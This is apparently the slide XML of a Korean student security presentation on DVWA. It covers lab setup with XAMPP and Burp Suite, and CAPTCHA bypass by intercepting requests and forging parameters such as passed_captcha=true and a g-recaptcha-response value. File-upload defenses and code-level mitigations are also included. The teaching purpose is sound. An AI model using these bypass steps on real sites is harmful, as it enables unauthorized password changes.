              <a:lnSpc>
                <a:spcPct val="270000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="270000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>업로드하는 사진  파일을 분해하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>jpg, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일로 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>재생성한다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70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일의 이름을 재지정해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서 찾을 수 없도록 한다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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Midium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서는 실제 이미지 파일이 아닌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일을 이미지 파일인 척 가장해 업로드하였다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이 파일을 분해해 다시 이미지 파일로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>재생성하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 방식으로 이미지 파일을 분류할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"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270000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>또한 파일의 이름을 서버에서 재지정하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 통해 접근할 수 없으므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일의 이름을 재지정하는 방식을 사용할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"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2562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6C5898-8357-4C26-8A5A-064F4672E94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94FB019-8F79-4C25-89D9-4E6888C5E8CB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E22650C1-1F7F-4CA1-9AE7-F3739B437E13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813" y="3048507"/>
            <a:ext cx="4218183" cy="1352903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4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4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46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122472" y="3309457"/>
            <a:ext cx="2193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3-6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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3818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개요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1879600"/>
            <a:ext cx="5913238" cy="735330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CAPTCHA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컴퓨터가 알 수 없는 흘려 쓴 글씨나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그림 등의 클릭 키를 입력 받아서 사람인지 확인해서  자동화 공격을  막는 보안 문자이다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Insecure CAPTCHA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보안문자를 성공적으로 입력 받으면 허용해주는 부분을 비정상적으로 우회하는 공격 기법 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15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PC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환경 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D0674CF-7665-4120-B23C-85887A5F4FA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" b="376"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4614863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인터넷을 열어서 우측 클릭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&gt; Preferences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92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설치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7254240"/>
            <a:ext cx="5913238" cy="197866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인스톨러를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실행시키면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GUI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뜬다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499"/>
            <a:ext cx="5913238" cy="520701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console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cp /root/Downloads/xampp-linux-x64-5.6.23-0-installer.run /root/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**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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다운로드한 파일을 루트 아래로 복사한다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.**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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cd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chmod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+x xampp-linux-x64-5.6.23-0-installer.run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**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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실행권한을 준다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.**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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./xampp-linux-x64-5.6.23-0-installer.run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**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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실행시킨다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.**</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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3002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PC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환경 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3454B44-F257-41A6-8593-E4AA8FF81F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" r="2343"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4614863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맨 밑으로 내려서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Settings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51059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PC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환경 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09609BAB-2CA3-438F-8A44-DF1A9A3AB4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0" b="2900"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4614863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Manual proxy configuration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HTTP Proxy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자신의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PORT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8080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OK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13859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PC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환경 설정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EE7D448E-F18B-476F-AB08-92A69494C05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3" b="19291"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="2212324"/>
            <a:ext cx="5911850" cy="4371039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Kali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왼쪽 상단의 메뉴 버튼 클릭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03 - Web Application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Analyis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-&gt;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burpsuite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9683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PC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환경 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9C3BECBC-C9DE-4B29-836A-2274F3AC5F8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" r="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6050309" cy="4614863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Next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79234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PC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환경 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9049DB29-CEA2-41E9-B872-9D8EB6973F5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3" r="444"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004620" cy="4614863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Start Burp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11209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PC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환경 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3E81746A-2E97-4CB3-98D9-4A5103C35B5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7" r="-680"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004619" cy="4614863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15219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PC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환경 설정</a:t>
            </a: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8EA052B7-BC0D-4E80-BD19-0A0477D2A5A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" r="-61"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004620" cy="4614863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Proxy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Options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클릭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008627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PC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환경 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1731C54D-BB37-469C-8547-DEBAB7C1BB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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004619" cy="4614863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Port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8080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Specific address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자신의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38141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PC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환경 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1373C71-C88B-47EB-B81A-C004F632C7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" r="-118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004619" cy="4614863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사이트에 접속하면 캐시 값을 잡아주는 것을 확인 가능하다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59109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level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소스코드는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step1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구글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Captcha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key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정보들과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password_new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password_conf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일치 여부를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확인한 다음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step2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넘겨주도록 구성되어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step2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에서는 다시 한번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password_new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conf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일치 여부를 검증한 다음 해당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수정하는 작업을 진행한다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6DB19215-27BC-40DF-B125-51ECDD957C2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8219" b="8219"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="2024063"/>
            <a:ext cx="5915025" cy="4751387"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3424648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설치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8FE1A2F-B063-4368-9BE7-6D2107571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92" y="1978247"/>
            <a:ext cx="4024215" cy="33400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903C6CF-A846-4B29-8BF3-CF5C9BC17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592" y="5555331"/>
            <a:ext cx="4057762" cy="33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2626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786520"/>
            <a:ext cx="5913238" cy="3446380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Suite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사용해 분석한 결과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변경할 비밀번호가 넘어가는 것을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26264095-CC29-44AE-9B8F-EA3AFCD3A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0592" y="1957255"/>
            <a:ext cx="5915026" cy="2995746"/>
          </a:xfrm>
        </p:spPr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F8AA05-245E-4E6B-BEDD-1F8F13C0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2" y="1896673"/>
            <a:ext cx="5913238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7627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78520"/>
            <a:ext cx="5913238" cy="3954380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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가로채어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내용을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수정한다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그림 개체 틀 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26264095-CC29-44AE-9B8F-EA3AFCD3A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0592" y="1957255"/>
            <a:ext cx="5915026" cy="2995746"/>
          </a:xfrm>
        </p:spPr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1F8AA05-245E-4E6B-BEDD-1F8F13C0D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92" y="1896673"/>
            <a:ext cx="5913238" cy="33818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505B9AC-F762-4CA9-AAC6-B5F6B125807F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696686" y="4775200"/>
            <a:ext cx="2732314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2591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대비책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113693"/>
            <a:ext cx="5913238" cy="3119207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경우 패스워드가 무조건 변경되는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구성을 취하고 있으므로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CAPTCHA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존재하는지 검증하는 코드를 추가하여 취약점을 보안할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A86CF49-8930-4546-B3F1-CA514D9FC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0" y="1866941"/>
            <a:ext cx="5958930" cy="408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62901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pass_new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값과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pass_conf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같을 경우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passed_captche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true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되는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부분이 추가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Passed_captcche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false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경우 실패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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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" r="3045"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191186145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되어야한다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Passed_captcha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true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되어야한다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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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r="3900"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6050307" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8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F338EB-D7F6-4970-929D-69436CD2CB40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="1968500"/>
            <a:ext cx="5569375" cy="4748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42AC10-32AF-4EC3-833A-D8B6F6FCF35A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579090" y="4804141"/>
            <a:ext cx="3183441" cy="367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6548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Pass_new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변경할 패스워드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pass_conf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변경할 패스워드 확인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같아야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 조건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개가 만족할 경우 비밀번호 변경 조건이 실행된다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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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" b="889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6050307" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8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A4A905C-84FF-4195-8DE0-CE0F848D11CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="2083026"/>
            <a:ext cx="2196588" cy="2404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8487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캐시 확인하면 기본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1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값으로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Password_new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값과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password_conf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1234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값을 준  것을 알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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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6" r="12903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6050309" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409225213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 번호 조건을 만족하기 위해서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변경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Passed_captcha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true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되어야 해서 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Passed_captcha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ture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추가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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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r="2393"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004618" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175484008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25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5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대비책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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5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고정된 매개변수의 값을 사용해서 취약점이 발생했다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인증이 성공할 경우 데이터 값과 추가적으로 헤더 값 부분에서 인증한다면 해결 할 수 있다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$_POST[ 'g-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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recaptcha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-response' ] == 'hidd3n_valu3’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&amp;&amp; $_SERVER[ 'HTTP_USER_AGENT' ] == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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reCAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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800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헤더 값과 데이터 값을 체크해서 인증한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern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en-US" altLang="ko-KR" sz="1800" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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21664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부분에는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부분에 대한 조건이 있지만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에는 없다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$resp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관한 부분만 있었지만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g-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recaptcha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respons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HTTP_USER_AGENT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대한 조건이 추가되었다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Passed_captcche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포함된 조건문들이 없어졌다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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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4" r="704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6004620" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8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2993AEE-1B2E-4890-BC9D-CC4005253E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380998" y="2013471"/>
            <a:ext cx="3831238" cy="2438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2BA9B1-B39C-4195-837D-F5660089DA46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139252" y="5156616"/>
            <a:ext cx="5246367" cy="11842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43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B2DB40D-D024-43AA-9F8F-F8B80E87B0C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6464" y="3632200"/>
            <a:ext cx="5485072" cy="536516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  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>서론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  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0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1)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프로젝트 개요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2. OWASP, DVWA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	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1) </a:t>
            </a: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Owasp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Api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Security 2019</a:t>
            </a:r>
          </a:p>
          <a:p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2) </a:t>
            </a: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Dvwa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개요 및 설치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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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개요 및 설치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C9497-C751-49D4-9613-0F131DD31C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="254003" y="241297"/>
            <a:ext cx="2880000" cy="2880000"/>
            <a:chOff x="1256523" y="234901"/>
            <a:chExt cx="2880000" cy="2880000"/>
          </a:xfrm>
        </p:grpSpPr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7D435771-E4CD-4066-A538-704A12BF0D5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1256523" y="234901"/>
              <a:ext cx="2880000" cy="2880000"/>
            </a:xfrm>
            <a:prstGeom prst="teardrop">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="204E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8D5980-5461-46B5-A7AA-DA930ED5FAC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505107" y="1290180"/>
              <a:ext cx="23828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INDEX</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="44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76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설치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E9AEEBE-916F-4B29-99A1-CFABEF97C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940" y="1879600"/>
            <a:ext cx="3843520" cy="31901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A67BDF-AE69-48FC-9835-3EAB0FB88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65" y="5925011"/>
            <a:ext cx="5117467" cy="3511087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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66B52516-4747-4D5F-AD76-CCDD9866BE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44997"/>
            <a:ext cx="5913238" cy="39879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체크박스의 체크를 풀어주고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Next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눌러서 설치를 완료한다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 완료되면 아래의 창이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떠야한다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3645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Resp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참이 되어야한다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또는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g-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recaptcha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-response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hidd3n_valu3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HTTP_USER_AGENT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reCAPTCHA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되어야한다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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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5" b="41669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426693" y="2212324"/>
            <a:ext cx="6004617" cy="4343341"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8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7F338EB-D7F6-4970-929D-69436CD2CB40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530013" y="3164823"/>
            <a:ext cx="4086958" cy="6126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32399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캐시 확인하면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Step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값과 변경할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g-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recaptcha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-response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HTTP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헤더 정보를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알수있다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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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t="572" r="469" b="-572"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1994892"/>
            <a:ext cx="6004620" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415248100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Resp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부분은 알 수 없지만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HTTP-User-Agent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g-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recaptcha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-response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확인 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조건을 만족하기 위해서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HTTP-User-Agent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g-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recaptcha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-response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변경한다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개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5DCB9-CC6E-466A-B777-2683736656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" r="2867"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1968500"/>
            <a:ext cx="6050309" cy="4614863"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8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536260F-8FA4-4DD5-83B5-453FCBBA08A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="2548328"/>
            <a:ext cx="1776863" cy="37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E8433F-CBD8-47A4-9DF0-47BE42ADD518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3672590" y="5876144"/>
            <a:ext cx="2758719" cy="2698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10892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5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5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대비책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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5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변경가능한 매개변수 값을 사용해서 취약점 발생했다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Captcha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인증부분과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추가적으로 정상적인 사용자와 서버만이 알고 있는 정보를 입력하는 부분인 현재 비밀번호를 확인을 한다면 막을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$data = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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db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-&gt;prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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$data-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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bindParam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(':user',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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dvwaCurrentUser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(),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PDO::PARAM_STR );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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$data&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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bindParam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(':password',$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0" dirty="0" err="1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pass_curr</a:t>
            </a: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PDO::PARAM_STR );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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$data-&gt;execute();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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600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입력한 비밀번호와 </a:t>
